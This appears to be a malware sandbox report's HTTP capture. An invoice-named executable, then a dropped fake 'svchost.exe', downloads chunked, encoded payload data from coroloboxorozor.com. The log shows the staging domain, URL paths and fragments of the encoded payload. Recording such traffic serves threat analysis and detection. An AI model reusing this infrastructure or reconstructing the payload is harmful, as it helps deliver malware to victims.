coroloboxorozor.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49737	172.67.172.17	80	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 15:30:32.337270021 CET	3773	OUT	GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 23, 2021 15:30:32.676027060 CET	3774	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:30:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d6f9f7eeb8494303f3678246738a675a01614090632; expires=Thu, 25-Mar-21 14:30:32 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Tue, 23 Feb 2021 00:43:13 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e594b60000fa7cb2a6d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5foyntsxSQ7Bj7XYzqxTk2tdahoOvK5787sm7ZoaWANXzBl0pXvcv%2FawItCLChJ54%2B%2FuN6yFY9S18j7x6bA6G8QhJxK5huyY%2F1fMZlUKx6nAQq0S"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6261a5345e52fa7c-AMS Data Raw: 36 37 35 30 0d 0a 3c 70 3e 4b 4b 53 66 48 53 56 74 74 53 48 53 58 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53 67 55 55 53 67 55 55 53 48 53 48 53 56 51 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 77 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 48 53 48 53 56 74 53 58 56 53 56 51 77 53 56 74 53 48 53 56 51 48 53 66 53 67 48 55 53 58 58 53 56 51 74 53 56 53 4b 77 53 67 48 55 53 58 58 53 51 74 53 56 48 74 53 56 48 55 53 56 56 55 53 58 67 53 56 56 67 53 56 56 74 53 56 56 56 53 56 48 58 53 56 56 74 53 66 4b 53 56 48 66 53 58 67 53 66 66 53 66 4b 53 56 56 48 53 56 56 48 53 56 56 56 53 56 56 77 53 58 67 53 66 51 53 56 48 56 53 58 67 53 56 56 74 53 56 56 4b 53 56 56 48 53 58 67 53 56 48 55 53 56 56 48 53 58 67 53 77 51 53 4b 66 53 51 58 53 58 67 53 56 48 66 53 56 56 56 53 56 48 48 53 56 48 56 53 74 77 53 56 58 53 56 58 53 56 48 53 58 77 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 51 48 53 77 66 53 48 53 48 53 4b 77 53 56 53 58 53 48 53 4b 77 53 56 74 67 53 74 56 53 56 51 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 67 67 74 53 48 53 58 74 53 48 53 56 56 53 56 53 51 48 53 48 53 48 53 56 58 74 53 56 48 53 48 53 48 53 77 53 48 53 48 53 48 53 48 53 48 53 48 53 56 66 48 53 56 77 55 53 56 48 53 48 53 48 53 58 67 53 48 53 48 53 48 53 56 66 67 53 56 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 58 67 53 48 53 48 53 48 53 67 53 48 53 48 53 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 74 53 48 53 48 Data Ascii: 6750<p>KKSfHSVttSHSXSHSHSHStSHSHSHSgUUSgUUSHSHSVQtSHSHSHSHSHSHSHSwtSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSVgQSHSHSHSVtSXVSVQwSVtSHSVQHSfSgHUSXXSVQtSVSKwSgHUSXXSQtSVHtSVHUSVVUSXgSVVgSVVtSVVVSVHXSVVtSfKSVHfSXgSffSfKSVVHSVVHSVVVSVVwSXgSfQSVHVSXgSVVtSVVKSVVHSXgSVHUSVVHSXgSwQSKfSQXSXgSVHfSVVVSVHHSVHVStwSVXSVXSVHSXwSHSHSHSHSHSHSHSQHSwfSHSHSKwSVSXSHSKwSVtgStVSVQHSHSHSHSHSHSHSHSHSggtSHSXtSHSVVSVSQHSHSHSVXtSVHSHSHSwSHSHSHSHSHSHSVfHSVwUSVHSHSHSXgSHSHSHSVfgSVHSHSHSHSHSVgQSHSXgSHSHSHSgSHSHStSHSHSHSHSHSHSHStSHSH
Feb 23, 2021 15:30:32.676055908 CET	3776	IN	Data Raw: 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 56 56 53 48 53 48 53 67 53 48 53 48 53 48 53 48 53 48 53 48 53 67 53 48 53 77 74 53 56 58 58 53 48 53 48 53 56 77 53 48 53 48 53 56 77 53 48 53 48 53 48 53 48 53 56 77 53 48 53 48 53 56 77 53 48 53 48 Data Ascii: SHSHSHSHSHSHSHSVVSHSHSgSHSHSHSHSHSHSgSHSwtSVXXSHSHSVwSHSHSVwSHSHSHSHSVwSHSHSVwSHSHSHSHSHSHSVwSHSHSHSHSHSHSHSHSHSHSHSVVgSVwUSVHSHSKUSHSHSHSHSVfgSVHSHSVXwSXSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSggtSVHSHSVgSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHS
Feb 23, 2021 15:30:32.676100969 CET	3777	IN	Data Raw: 48 53 56 56 4b 53 48 53 48 53 56 48 53 74 67 53 58 48 53 67 53 74 48 53 56 58 77 53 48 53 48 53 56 48 53 74 67 53 58 51 53 48 53 67 53 74 48 53 56 58 4b 53 48 53 48 53 56 48 53 48 53 74 67 53 56 77 77 53 56 56 55 53 56 58 51 53 48 53 48 53 56 48 Data Ascii: HSVVKSHSHSVHStgSXHSgStHSVXwSHSHSVHStgSXQSHSgStHSVXKSHSHSVHSHStgSVwwSVVUSVXQSHSHSVHSVgQStSHSHStSVVUSVXfSHSHSVHSVgQSUSHSHStSVVUSVtHSHSHSVHSVgQSwSHSHStSVVUSVtVSHSHSVHSVgQSKSHSHStStgSXQSHSXSgUtSgVSfSHSHSgKStgSXQSHSgStHSVVKSHSHSVHSHStgSQgSHSgStHSVV
Feb 23, 2021 15:30:32.676121950 CET	3779	IN	Data Raw: 55 4b 53 58 4b 53 67 4b 53 58 56 53 56 67 55 53 56 55 4b 53 58 4b 53 58 67 53 74 53 48 53 48 53 48 53 58 56 53 55 58 53 56 55 4b 53 58 4b 53 58 67 53 74 53 48 53 48 53 48 53 58 56 53 55 77 53 56 55 4b 53 58 4b 53 67 77 53 58 56 53 74 66 53 56 55 Data Ascii: UKSXKSgKSXVSVgUSVUKSXKSXgStSHSHSHSXVSUXSVUKSXKSXgStSHSHSHSXVSUwSVUKSXKSgwSXVStfSVUKSXKSXgSXSHSHSHSXVSVHVSVUKSXKSXgSXSHSHSHSXVSVHHSVUKSXKSgUSXVSVgXSVUKSXKSXgSgSHSHSHSXVSVHHSVUKSXKSXgSgSHSHSHSXVSUXSVUKSXKSgtSXVSVgUSVUKSXKSXgSVSHSHSHSXVSUXSVUKSXK
Feb 23, 2021 15:30:32.676139116 CET	3780	IN	Data Raw: 53 58 67 53 77 53 48 53 48 53 48 53 58 56 53 55 74 53 56 55 4b 53 58 4b 53 58 67 53 77 53 48 53 48 53 48 53 58 56 53 55 56 53 56 55 4b 53 58 4b 53 67 51 53 58 56 53 56 56 51 53 56 55 4b 53 58 4b 53 58 67 53 55 53 48 53 48 53 48 53 58 56 53 55 77 Data Ascii: SXgSwSHSHSHSXVSUtSVUKSXKSXgSwSHSHSHSXVSUVSVUKSXKSgQSXVSVVQSVUKSXKSXgSUSHSHSHSXVSUwSVUKSXKSXgSUSHSHSHSXVSUXSVUKSXKSgKSXVSVHHSVUKSXKSXgStSHSHSHSXVSfQSVUKSXKSXgStSHSHSHSXVSUUSVUKSXKSgwSXVSwUSVUKSXKSXgSXSHSHSHSXVSffSVUKSXKSXgSXSHSHSHSXVSffSVUKSXKS
Feb 23, 2021 15:30:32.676156044 CET	3781	IN	Data Raw: 58 56 53 56 56 48 53 56 55 4b 53 58 4b 53 58 67 53 4b 53 48 53 48 53 48 53 58 56 53 55 55 53 56 55 4b 53 58 4b 53 58 67 53 4b 53 48 53 48 53 48 53 58 56 53 74 51 53 56 55 4b 53 58 4b 53 67 66 53 58 56 53 66 4b 53 56 55 4b 53 58 4b 53 58 67 53 77 Data Ascii: XVSVVHSVUKSXKSXgSKSHSHSHSXVSUUSVUKSXKSXgSKSHSHSHSXVStQSVUKSXKSgfSXVSfKSVUKSXKSXgSwSHSHSHSXVSfQSVUKSXKSXgSwSHSHSHSXVSVHgSVUKSXKSgQSXVSVVQSVUKSXKSXgSUSHSHSHSXVStQSVUKSXKSXgSUSHSHSHSXVStQSVUKSXKSgKSXVSVHHSVUKSXKSXgStSHSHSHSXVSVHHSVUKSXKSXgStSHSHS
Feb 23, 2021 15:30:32.676172972 CET	3783	IN	Data Raw: 53 58 4b 53 58 56 53 56 48 48 53 58 56 53 56 56 48 53 56 55 4b 53 58 4b 53 58 67 53 66 66 53 48 53 48 53 48 53 58 56 53 56 48 67 53 56 55 4b 53 58 4b 53 58 67 53 66 66 53 48 53 48 53 48 53 58 56 53 55 56 53 56 55 4b 53 58 4b 53 58 56 53 66 66 53 Data Ascii: SXKSXVSVHHSXVSVVHSVUKSXKSXgSffSHSHSHSXVSVHgSVUKSXKSXgSffSHSHSHSXVSUVSVUKSXKSXVSffSXVSVVKSVUKSXKSXgSfQSHSHSHSXVSUHSVUKSXKSXgSfQSHSHSHSXVSUXSVUKSXKSXVSfQSXVSQgSVUKSXKSXgSfKSHSHSHSXVSVHgSVUKSXKSXgSfKSHSHSHSXVSVHgSVUKSXKSXVSfKSXVStKSVUKSXKSXgSfwSH
Feb 23, 2021 15:30:32.676193953 CET	3784	IN	Data Raw: 58 56 53 51 56 53 58 56 53 66 4b 53 56 55 4b 53 58 4b 53 58 67 53 51 48 53 48 53 48 53 48 53 58 56 53 55 58 53 56 55 4b 53 58 4b 53 58 67 53 51 48 53 48 53 48 53 48 53 58 56 53 55 55 53 56 55 4b 53 58 4b 53 58 56 53 51 48 53 58 56 53 56 56 77 53 Data Ascii: XVSQVSXVSfKSVUKSXKSXgSQHSHSHSHSXVSUXSVUKSXKSXgSQHSHSHSHSXVSUUSVUKSXKSXVSQHSXVSVVwSVUKSXKSXgSKfSHSHSHSXVSUXSVUKSXKSXgSKfSHSHSHSXVSfKSVUKSXKSXVSKfSXVSQXSVUKSXKSXgSKQSHSHSHSXVSVHgSVUKSXKSXgSKQSHSHSHSXVStQSVUKSXKSXVSKQSXVStKSVUKSXKSXgSKKSHSHSHSXVS
Feb 23, 2021 15:30:32.676212072 CET	3785	IN	Data Raw: 4b 53 58 4b 53 58 67 53 77 56 53 48 53 48 53 48 53 58 56 53 55 58 53 56 55 4b 53 58 4b 53 58 67 53 77 56 53 48 53 48 53 48 53 58 56 53 55 74 53 56 55 4b 53 58 4b 53 58 56 53 77 56 53 58 56 53 58 67 53 56 55 4b 53 58 4b 53 58 67 53 77 48 53 48 53 Data Ascii: KSXKSXgSwVSHSHSHSXVSUXSVUKSXKSXgSwVSHSHSHSXVSUtSVUKSXKSXVSwVSXVSXgSVUKSXKSXgSwHSHSHSHSXVSUXSVUKSXKSXgSwHSHSHSHSXVSVHVSVUKSXKSXVSwHSXVSXtSVUKSXKSXgSUfSHSHSHSXVSffSVUKSXKSXgSUfSHSHSHSXVSUgSVUKSXKSXVSUfSXVSXtSVUKSXKSXgSUQSHSHSHSXVSVHHSVUKSXKSXgSU
Feb 23, 2021 15:30:32.676224947 CET	3787	IN	Data Raw: 53 58 67 53 74 58 53 48 53 48 53 48 53 58 56 53 74 66 53 56 55 4b 53 58 4b 53 58 56 53 74 58 53 58 56 53 56 48 55 53 56 55 4b 53 58 4b 53 58 67 53 74 67 53 48 53 48 53 48 53 58 56 53 66 4b 53 56 55 4b 53 58 4b 53 58 67 53 74 67 53 48 53 48 53 48 Data Ascii: SXgStXSHSHSHSXVStfSVUKSXKSXVStXSXVSVHUSVUKSXKSXgStgSHSHSHSXVSfKSVUKSXKSXgStgSHSHSHSXVStfSVUKSXKSXgStgSHSHSHSXVSUgSVUKSXKSXVStgSXVSVVtSVUKSXKSXgStVSHSHSHSXVStfSVUKSXKSXgStVSHSHSHSXVSUKSVUKSXKSXgStVSHSHSHSXVSfKSVUKSXKSXVStVSXVSQHSVUKSXKSXgStHSHS
Feb 23, 2021 15:30:32.677155018 CET	3788	IN	Data Raw: 53 48 53 58 56 53 74 66 53 56 55 4b 53 58 4b 53 58 56 53 67 66 53 58 56 53 56 56 77 53 56 55 4b 53 58 4b 53 58 67 53 67 51 53 48 53 48 53 48 53 58 56 53 56 48 48 53 56 55 4b 53 58 4b 53 58 67 53 67 51 53 48 53 48 53 48 53 58 56 53 55 48 53 56 55 Data Ascii: SHSXVStfSVUKSXKSXVSgfSXVSVVwSVUKSXKSXgSgQSHSHSHSXVSVHHSVUKSXKSXgSgQSHSHSHSXVSUHSVUKSXKSXgSgQSHSHSHSXVSUHSVUKSXKSXVSgQSXVSfKSVUKSXKSXgSgKSHSHSHSXVSUUSVUKSXKSXgSgKSHSHSHSXVStQSVUKSXKSXgSgKSHSHSHSXVSUXSVUKSXKSXVSgKSXVSVVwSVUKSXKSXgSgwSHSHSHSXVSUK
Feb 23, 2021 15:30:33.159687042 CET	4835	OUT	GET /base/320AB9634C12E7907B8FA24F3948BF4F.html HTTP/1.1 Host: coroloboxorozor.com
Feb 23, 2021 15:30:33.513365030 CET	4836	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:30:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d7601b644b9892d090c594eb8690c19be1614090633; expires=Thu, 25-Mar-21 14:30:33 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Tue, 23 Feb 2021 00:43:17 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e597ee0000fa7cca248000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7zHO1hbjXq%2F8XIXWeOvKo4ZaX7ahFFiDZUhhSk2ZDqxdHuo0j6bcHwOzkfeEXa8ZMxOe1tx%2FJy0X%2FnOUA5kSSB6cbfNOr0bIQxIAvdwLSLppf690"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6261a53978a2fa7c-AMS Data Raw: 33 32 38 35 0d 0a 3c 70 3e 58 74 53 4b 55 53 4b 56 53 56 4b 67 53 56 74 56 53 56 51 48 53 56 4b 67 53 56 55 66 53 55 67 53 67 74 51 53 66 77 53 51 48 53 67 74 51 53 58 51 53 56 77 67 53 55 55 53 56 74 56 53 58 55 53 4b 66 53 67 67 67 53 56 67 56 53 56 77 58 53 56 55 4b 53 56 55 56 53 56 66 53 67 48 48 53 56 58 74 53 51 55 53 56 67 4b 53 77 48 53 58 51 53 56 77 48 53 67 74 55 53 55 58 53 67 66 53 67 4b 53 77 74 53 56 74 58 53 77 51 53 58 56 53 67 67 56 53 56 74 51 53 56 58 4b 53 56 51 66 53 58 4b 53 56 77 58 53 66 66 53 56 67 55 53 56 74 51 53 56 48 4b 53 56 56 58 53 56 51 51 53 67 74 77 53 56 48 74 53 56 53 4b 66 53 56 4b 77 53 67 74 48 53 55 58 53 67 56 4b 53 66 55 53 74 77 53 67 67 66 53 56 56 56 53 66 53 56 58 56 53 67 56 48 53 56 56 56 53 56 48 48 53 56 56 77 53 56 51 4b 53 4b 48 53 67 67 48 53 56 56 53 51 74 53 56 56 74 53 51 55 53 56 67 74 53 56 77 51 53 56 48 77 53 56 51 55 53 56 58 58 53 56 67 56 53 56 51 74 53 56 74 48 53 56 77 74 53 67 56 58 53 56 48 4b 53 55 48 53 67 74 55 53 56 77 66 53 67 67 74 53 56 58 77 53 66 4b 53 48 53 56 66 67 53 67 48 48 53 56 67 58 53 67 48 53 56 77 51 53 67 48 48 53 51 58 53 56 51 48 53 56 67 77 53 56 58 66 53 67 67 74 53 56 67 55 53 56 4b 77 53 51 4b 53 56 67 4b 53 58 58 53 56 56 51 53 51 58 53 77 48 53 67 67 66 53 67 67 55 53 56 51 66 53 55 53 51 77 53 74 4b 53 67 56 77 53 67 67 56 53 67 67 74 53 67 58 53 56 66 53 56 67 53 51 4b 53 67 67 56 53 56 58 55 53 56 4b 4b 53 67 4b 53 67 48 51 53 56 55 77 53 56 66 56 53 67 74 4b 53 67 55 56 53 77 77 53 51 56 53 56 77 74 53 55 55 53 67 74 48 53 67 74 53 67 74 66 53 67 4b 53 56 67 67 53 56 58 48 53 67 74 56 53 67 Data Ascii: 3285<p>XtSKUSKVSVKgSVtVSVQHSVKgSVUfSUgSgtQSfwSQHSgtQSXQSVwgSUUSVtVSXUSKfSgggSVgVSVwXSVUKSVUVSVfSgHHSVXtSQUSVgKSwHSXQSVwHSgtUSUXSgfSgKSwtSVtXSwQSXVSggVSVtQSVXKSVQfSXKSVwXSffSVgUSVtQSVHKSVVXSVQQSgtwSVHtSVSKfSVKwSgtHSUXSgVKSfUStwSggfSVVVSfSVXVSgVHSVVVSVHHSVVwSVQKSKHSggHSVVSQtSVVtSQUSVgtSVwQSVHwSVQUSVXXSVgVSVQtSVtHSVwtSgVXSVHKSUHSgtUSVwfSggtSVXwSfKSHSVfgSgHHSVgXSgHSVwQSgHHSQXSVQHSVgwSVXfSggtSVgUSVKwSQKSVgKSXXSVVQSQXSwHSggfSggUSVQfSUSQwStKSgVwSggVSggtSgXSVfSVgSQKSggVSVXUSVKKSgKSgHQSVUwSVfVSgtKSgUVSwwSQVSVwtSUUSgtHSgtSgtfSgKSVggSVXHSgtVSg
Feb 23, 2021 15:30:35.572432041 CET	5898	OUT	GET /base/EFDD2E5486C74022C50C219C9576AB0D.html HTTP/1.1 Host: coroloboxorozor.com
Feb 23, 2021 15:30:35.872076988 CET	5899	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:30:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db325fdc5f12250f5970d4895fb693cd91614090635; expires=Thu, 25-Mar-21 14:30:35 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Tue, 23 Feb 2021 00:43:19 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e5a15b0000fa7cd22af000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0ZOiNwG8Hs3WiE75qOGVpftBqHuAilJ3U66wdKzRL7xvEoYp2HjOquoEeIgRRfmtmQAKiAHG7N2QHg1DrgkyMuGHU%2BD3BPmqPEnwhTz1mMjG9sRQ"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6261a5489870fa7c-AMS Data Raw: 36 34 39 62 0d 0a 3c 70 3e 55 74 53 48 53 55 55 53 48 53 74 66 53 48 53 48 53 58 4b 53 55 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 51 58 53 67 67 4b 53 56 51 53 67 67 4b 53 56 77 53 67 67 4b 53 74 51 53 67 67 4b 53 77 51 53 67 67 4b 53 4b 51 53 67 67 4b 53 77 55 53 67 67 4b 53 77 56 53 67 67 4b 53 77 74 53 67 67 4b 53 58 56 53 67 67 4b 53 4b 55 53 67 67 4b 53 4b 74 53 67 67 4b 53 51 48 53 67 67 4b 53 77 55 53 67 67 4b 53 51 74 53 67 67 4b 53 51 48 53 67 67 4b 53 56 53 56 56 53 55 58 53 48 53 55 77 53 48 53 74 51 53 48 53 55 55 53 48 53 55 74 53 48 53 48 53 56 55 53 55 67 53 67 55 58 53 77 67 53 67 55 58 53 55 58 53 67 55 58 53 67 55 55 53 67 55 67 53 55 74 53 67 55 58 53 4b 58 53 67 55 58 53 55 74 53 67 55 58 53 56 53 56 56 53 55 74 53 48 53 55 67 53 48 53 55 55 53 48 53 55 48 53 48 53 74 66 53 48 53 48 53 67 55 53 67 4b 53 58 74 53 4b 66 53 58 74 53 56 67 53 58 74 53 66 77 53 58 74 53 51 55 53 58 74 53 51 66 53 58 74 53 51 56 53 58 74 53 66 56 53 58 74 53 66 4b 53 58 74 53 66 77 53 58 74 53 56 67 53 58 74 53 67 66 53 58 74 53 56 53 66 53 55 77 53 48 53 55 74 53 48 53 55 77 53 48 53 55 67 53 48 53 48 53 58 56 53 56 74 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 48 67 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 74 77 53 56 67 66 53 56 74 66 53 56 67 66 53 56 48 67 53 56 67 66 53 56 53 56 56 53 55 56 53 48 53 55 56 53 48 53 74 51 53 48 53 55 4b 53 48 53 55 67 53 48 53 48 53 58 56 53 56 56 53 56 4b 53 56 51 53 56 4b 53 56 Data Ascii: 649b<p>UtSHSUUSHStfSHSHSXKSUVSggKSKUSggKSQXSggKSVQSggKSVwSggKStQSggKSwQSggKSKQSggKSwUSggKSwVSggKSwtSggKSXVSggKSKUSggKSKtSggKSQHSggKSwUSggKSQtSggKSQHSggKSVSVVSUXSHSUwSHStQSHSUUSHSUtSHSHSVUSUgSgUXSwgSgUXSUXSgUXSgUUSgUgSUtSgUXSKXSgUXSUtSgUXSVSVVSUtSHSUgSHSUUSHSUHSHStfSHSHSgUSgKSXtSKfSXtSVgSXtSfwSXtSQUSXtSQfSXtSQVSXtSfVSXtSfKSXtSfwSXtSVgSXtSgfSXtSVSfSUwSHSUtSHSUwSHSUgSHSHSXVSVtgSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVHgSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVtwSVgfSVtfSVgfSVHgSVgfSVSVVSUVSHSUVSHStQSHSUKSHSUgSHSHSXVSVVSVKSVQSVKSV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49752	104.21.71.230	80	C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 15:31:12.975899935 CET	6179	OUT	GET /base/A665A0731C4748264DB5C2625CAB61D4.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 23, 2021 15:31:13.199505091 CET	6186	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 14:31:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d4e3a67d1b9f468c9ad5bce1e6f0001db1614090673; expires=Thu, 25-Mar-21 14:31:13 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Tue, 23 Feb 2021 00:43:13 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0870e6337400000b473019c000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LmUQKAyD9esFOp0HZ7we%2F9EeyHtjW4hU9FuDhPJ%2BOAGfDqBJnGgZTSL6nWbPSizHWbe6p06tf3%2F6uzLR2WuO2D63zPeEP3OJ72BUMq0UnsFnGDz4"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6261a6325d1b0b47-AMS Data Raw: 63 35 63 0d 0a 3c 70 3e 4b 4b 53 66 48 53 56 74 74 53 48 53 58 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53 67 55 55 53 67 55 55 53 48 53 48 53 56 51 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 77 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 48 53 48 53 56 74 53 58 56 53 56 51 77 53 56 74 53 48 53 56 51 48 53 66 53 67 48 55 53 58 58 53 56 51 74 53 56 53 4b 77 53 67 48 55 53 58 58 53 51 74 53 56 48 74 53 56 48 55 53 56 56 55 53 58 67 53 56 56 67 53 56 56 74 53 56 56 56 53 56 48 58 53 56 56 74 53 66 4b 53 56 48 66 53 58 67 53 66 66 53 66 4b 53 56 56 48 53 56 56 48 53 56 56 56 53 56 56 77 53 58 67 53 66 51 53 56 48 56 53 58 67 53 56 56 74 53 56 56 4b 53 56 56 48 53 58 67 53 56 48 55 53 56 56 48 53 58 67 53 77 51 53 4b 66 53 51 58 53 58 67 53 56 48 66 53 56 56 56 53 56 48 48 53 56 48 56 53 74 77 53 56 58 53 56 58 53 56 48 53 58 77 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 51 48 53 77 66 53 48 53 48 53 4b 77 53 56 53 58 53 48 53 4b 77 53 56 74 67 53 74 56 53 56 51 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 67 67 74 53 48 53 58 74 53 48 53 56 56 53 56 53 51 48 53 48 53 48 53 56 58 74 53 56 48 53 48 53 48 53 77 53 48 53 48 53 48 53 48 53 48 53 48 53 56 66 48 53 56 77 55 53 56 48 53 48 53 48 53 58 67 53 48 53 48 53 48 53 56 66 67 53 56 48 53 48 53 48 53 48 53 48 53 56 67 51 53 48 53 58 67 53 48 53 48 53 48 53 67 53 48 53 48 53 74 53 48 53 48 53 48 53 48 53 48 53 48 53 48 53 74 53 48 53 48 53 48 53 Data Ascii: c5c<p>KKSfHSVttSHSXSHSHSHStSHSHSHSgUUSgUUSHSHSVQtSHSHSHSHSHSHSHSwtSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSVgQSHSHSHSVtSXVSVQwSVtSHSVQHSfSgHUSXXSVQtSVSKwSgHUSXXSQtSVHtSVHUSVVUSXgSVVgSVVtSVVVSVHXSVVtSfKSVHfSXgSffSfKSVVHSVVHSVVVSVVwSXgSfQSVHVSXgSVVtSVVKSVVHSXgSVHUSVVHSXgSwQSKfSQXSXgSVHfSVVVSVHHSVHVStwSVXSVXSVHSXwSHSHSHSHSHSHSHSQHSwfSHSHSKwSVSXSHSKwSVtgStVSVQHSHSHSHSHSHSHSHSHSggtSHSXtSHSVVSVSQHSHSHSVXtSVHSHSHSwSHSHSHSHSHSHSVfHSVwUSVHSHSHSXgSHSHSHSVfgSVHSHSHSHSHSVgQSHSXgSHSHSHSgSHSHStSHSHSHSHSHSHSHStSHSHSHS
Feb 23, 2021 15:31:13.199541092 CET	6187	IN	Data Raw: 48 53 48 53 48 53 48 53 48 53 48 53 56 56 53 48 53 48 53 67 53 48 53 48 53 48 53 48 53 48 53 48 53 67 53 48 53 77 74 53 56 58 58 53 48 53 48 53 56 77 53 48 53 48 53 56 77 53 48 53 48 53 48 53 48 53 56 77 53 48 53 48 53 56 77 53 48 53 48 53 48 53 Data Ascii: HSHSHSHSHSHSVVSHSHSgSHSHSHSHSHSHSgSHSwtSVXXSHSHSVwSHSHSVwSHSHSHSHSVwSHSHSVwSHSHSHSHSHSHSVwSHSHSHSHSHSHSHSHSHSHSHSVVgSVwUSVHSHSKUSHSHSHSHSVfgSVHSHSVXwSXSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSggtSVHSHSVgSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSHSH
Feb 23, 2021 15:31:13.199558973 CET	6188	IN	Data Raw: 56 4b 53 48 53 48 53 56 48 53 74 67 53 58 48 53 67 53 74 48 53 56 58 77 53 48 53 48 53 56 48 53 74 67 53 58 51 53 48 53 67 53 74 48 53 56 58 4b 53 48 53 48 53 56 48 53 48 53 74 67 53 56 77 77 53 56 56 55 53 56 58 51 53 48 53 48 53 56 48 53 56 67 Data Ascii: VKSHSHSVHStgSXHSgStHSVXwSHSHSVHStgSXQSHSgStHSVXKSHSHSVHSHStgSVwwSVVUSVXQSHSHSVHSVgQStSHSHStSVVUSVXfSHSHSVHSVgQSUSHSHStSVVUSVtHSHSHSVHSVgQSwSHSHStSVVUSVtVSHSHSVHSVgQSKSHSHStStgSXQSHSXSgUtSgVSfSHSHSgKStgSXQSHSgStHSVVKSHSHSVHSHStgSQgSHSgStHSVVKSH
